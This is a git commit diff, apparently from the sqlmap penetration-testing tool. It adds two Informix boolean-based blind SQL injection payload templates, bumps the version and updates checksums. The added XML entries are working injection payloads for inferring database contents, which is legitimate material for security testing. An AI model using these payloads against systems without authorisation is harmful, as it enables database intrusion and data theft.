Adding Informix parameter replacement payloads (Issue #552)

stamparm · stamparm · commit 5079c42788b7 · 2016-09-27T14:39:17.000+02:00
diff --git a/lib/core/settings.py b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.revision import getRevisionNumber
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.0.9.42"
+VERSION = "1.0.9.43"
 REVISION = getRevisionNumber()
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
diff --git a/txt/checksum.md5 b/txt/checksum.md5
@@ -45,7 +45,7 @@ e60456db5380840a586654344003d4e6  lib/core/readlineng.py
 5ef56abb8671c2ca6ceecb208258e360  lib/core/replication.py
 99a2b496b9d5b546b335653ca801153f  lib/core/revision.py
 7c15dd2777af4dac2c89cab6df17462e  lib/core/session.py
-f9c92d337bfea55d24d24ae514e42a84  lib/core/settings.py
+025ec626a652d9195206f7dadc9c0e50  lib/core/settings.py
 7af83e4f18cab6dff5e67840eb65be80  lib/core/shell.py
 23657cd7d924e3c6d225719865855827  lib/core/subprocessng.py
 0bc2fae1dec18cdd11954b22358293f2  lib/core/target.py
@@ -449,7 +449,7 @@ d989813ee377252bca2103cea524c06b  xml/banner/sharepoint.xml
 fb93505ef0ab3b4a20900f3e5625260d  xml/boundaries.xml
 535d625cff8418bdc086ab4e1bbf5135  xml/errors.xml
 a279656ea3fcb85c727249b02f828383  xml/livetests.xml
-48ec50e72db89cb8f7bf25e9f45cfc92  xml/payloads/boolean_blind.xml
+4b266898af8b7f380db910511de24ec4  xml/payloads/boolean_blind.xml
 103a4c9b12c582b24a3fac8147a9c8d4  xml/payloads/error_based.xml
 06b1a210b190d52477a9d492443725b5  xml/payloads/inline_query.xml
 96adb9bfbab867d221974d3ddb303cb6  xml/payloads/stacked_queries.xml
diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml
@@ -841,6 +841,44 @@ Tag: <test>
         </details>
     </test>
 
+    <test>
+        <title>Informix boolean-based blind - Parameter replace</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</comparison>
+        </response>
+        <details>
+            <dbms>Informix</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Informix boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</comparison>
+        </response>
+        <details>
+            <dbms>Informix</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Microsoft Access boolean-based blind - Parameter replace</title>
         <stype>1</stype>
@@ -917,7 +955,7 @@ Tag: <test>
     <test>
         <title>Boolean-based blind - Parameter replace (CASE)</title>
         <stype>1</stype>
-        <level>3</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>1,3</clause>
         <where>3</where>
@@ -933,7 +971,7 @@ Tag: <test>
     <test>
         <title>Boolean-based blind - Parameter replace (CASE) (original value)</title>
         <stype>1</stype>
-        <level>4</level>
+        <level>3</level>
         <risk>1</risk>
         <clause>1,3</clause>
         <where>3</where>
